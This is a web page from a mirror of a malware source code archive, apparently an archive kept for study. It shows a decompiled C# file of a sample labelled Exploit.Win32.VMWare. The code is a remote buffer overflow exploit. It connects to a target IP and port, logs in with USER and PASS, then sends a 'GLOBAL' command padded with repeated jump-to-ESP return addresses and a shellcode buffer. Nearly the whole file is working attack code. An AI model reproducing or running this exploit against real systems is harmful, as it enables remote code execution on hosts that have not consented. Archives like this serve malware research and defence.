ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 03:16:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Exploit/Win32/V/Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd/_003CModule_003E.cs

207 lines
14 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: vmware, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 232CA0DF-503A-41D7-ADB3-576C6CA1BE9F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Exploit.Win32.VMWare-bf2f952a8a998a86b2dd1280b7dafa453f57fa370cefde8e201bff8c6300edbd.exe
using System;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Security;
internal class \u003CModule\u003E
{
public static \u0024ArrayType\u00240x5efdd7df \u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040;
public static \u0024ArrayType\u00240xf1cc4cbd \u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040;
public static \u0024ArrayType\u00240x0e6cb2b2 \u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040;
public static \u0024ArrayType\u00240x3a9112db \u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040;
public static \u0024ArrayType\u00240x5bb2c15a \u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x1d30cc0a \u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x6047384f \u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240xfec415c1 \u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x4b6a6b8c \u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x795c090e \u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040;
public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP_XP_Eng;
public static \u0024ArrayType\u00240x24ec09a1 shellcode;
public static \u0024ArrayType\u00240x8b5292b5 Jmp_ESP;
public static unsafe void usage()
{
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DB\u0040ICPJLJMF\u0040VMware\u003F5Overflow\u003F5Test\u003F5v1\u003F40\u003F5Writte\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0CB\u0040FOEJOKAI\u0040Fixed\u003F5by\u003F5agathos\u003F5\u003F\u0024DMeth0\u003F\u0024EAlist\u003F4ru\u003F\u0024DO\u003F6\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0DN\u0040JGNDLFBF\u0040Usage\u003F3\u003F5vmware\u003F4exe\u003F5\u003F\u0024DMIP\u003F\u0024DO\u003F5\u003F\u0024DMPORT\u003F\u0024DO\u003F5\u003F\u0024DMu\u0040, __arglist ());
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0EB\u0040NAMDAADC\u0040\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u003F\u0024CK\u003F\u0024DN\u0040, __arglist ());
}
public static unsafe int main(int argc, sbyte** argv)
{
if (argc != 6)
{
\u003CModule\u003E.usage();
return 0;
}
WSAData wsaData;
\u003CModule\u003E.WSAStartup((ushort) 514, &wsaData);
uint num1 = \u003CModule\u003E.socket(2, 1, 6);
sockaddr_in sockaddrIn;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ref sockaddrIn = (short) 2;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(short&) ((IntPtr) &sockaddrIn + 2) = (short) \u003CModule\u003E.htons((ushort) \u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 8)));
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(int&) ((IntPtr) &sockaddrIn + 4) = (int) \u003CModule\u003E.inet_addr((sbyte*) *(int*) ((IntPtr) argv + 4));
if (\u003CModule\u003E.atoi((sbyte*) *(int*) ((IntPtr) argv + 20)) != 0)
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
}
else
{
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 133) = (sbyte) -58;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 134) = (sbyte) -124;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 135) = (sbyte) -26;
// ISSUE: cast to a reference type
// ISSUE: explicit reference operation
^(sbyte&) ((IntPtr) &\u003CModule\u003E.shellcode + 136) = (sbyte) 119;
}
if (\u003CModule\u003E.connect(num1, (sockaddr*) &sockaddrIn, 16) == -1)
{
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_0P\u0040JJDDLOF\u0040connect\u003F5error\u003F6\u003F\u0024AA\u0040, __arglist ());
return -1;
}
\u0024ArrayType\u00240x8011bcc8 arrayType0x8011bcc8;
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05DLLLAEHA\u0040USER\u003F5\u003F\u0024AA\u0040, 6);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 12));
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num2 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num2, 0);
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_05FOGDDFF\u0040PASS\u003F5\u003F\u0024AA\u0040, 6);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) *(int*) ((IntPtr) argv + 16));
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num3 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num3, 0);
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
\u003CModule\u003E.recv(num1, (sbyte*) &arrayType0x8011bcc8, 100, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02DKCKIIND\u0040\u003F\u0024CFs\u003F\u0024AA\u0040, __arglist (out arrayType0x8011bcc8));
// ISSUE: initblk instruction
__memset(ref arrayType0x8011bcc8, 0, 4096);
// ISSUE: cpblk instruction
__memcpy(ref arrayType0x8011bcc8, ref \u003CModule\u003E.\u003F\u003F_C\u0040_07CJLPCIKB\u0040GLOBAL\u003F5\u003F\u0024AA\u0040, 8);
int num4 = (int) ((IntPtr) &arrayType0x8011bcc8 + 11);
uint num5 = 36;
do
{
// ISSUE: cpblk instruction
__memcpy(num4 - 4, ref \u003CModule\u003E.\u003F\u003F_C\u0040_04JKBAFAPB\u0040\u003F\u0024JA\u003F\u0024JAXh\u003F\u0024AA\u0040, 4);
// ISSUE: cpblk instruction
__memcpy(num4, ref \u003CModule\u003E.Jmp_ESP, 4);
num4 += 8;
--num5;
}
while (num5 > 0U);
// ISSUE: cast to a reference type
// ISSUE: cpblk instruction
__memcpy((\u0024ArrayType\u00240x8011bcc8&) ((IntPtr) &arrayType0x8011bcc8 + 295), ref \u003CModule\u003E.shellcode, 141);
\u003CModule\u003E.strcat((sbyte*) &arrayType0x8011bcc8, (sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_02PCIJFNDE\u0040\u003F\u0024AN\u003F6\u003F\u0024AA\u0040);
uint num6 = \u003CModule\u003E.strlen((sbyte*) &arrayType0x8011bcc8);
\u003CModule\u003E.send(num1, (sbyte*) &arrayType0x8011bcc8, (int) num6, 0);
\u003CModule\u003E.printf((sbyte*) &\u003CModule\u003E.\u003F\u003F_C\u0040_06MCOPMGCE\u0040Done\u003F\u0024CB\u003F6\u003F\u0024AA\u0040, __arglist ());
\u003CModule\u003E.closesocket(num1);
\u003CModule\u003E.WSACleanup();
return 1;
}
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int printf([In] sbyte* obj0, __arglist);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int WSACleanup();
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern int closesocket([In] uint obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int send([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint strlen([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe sbyte* strcat([In] sbyte* obj0, [In] sbyte* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int recv([In] uint obj0, [In] sbyte* obj1, [In] int obj2, [In] int obj3);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int connect([In] uint obj0, [In] sockaddr* obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe uint inet_addr([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int atoi([In] sbyte* obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern ushort htons([In] ushort obj0);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint socket([In] int obj0, [In] int obj1, [In] int obj2);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern unsafe int WSAStartup([In] ushort obj0, [In] WSAData* obj1);
[SuppressUnmanagedCodeSecurity]
[MethodImpl(MethodImplOptions.Unmanaged | MethodImplOptions.PreserveSig, MethodCodeType = MethodCodeType.Native)]
public static extern uint _mainCRTStartup();
}
Reference in New Issue Copy Permalink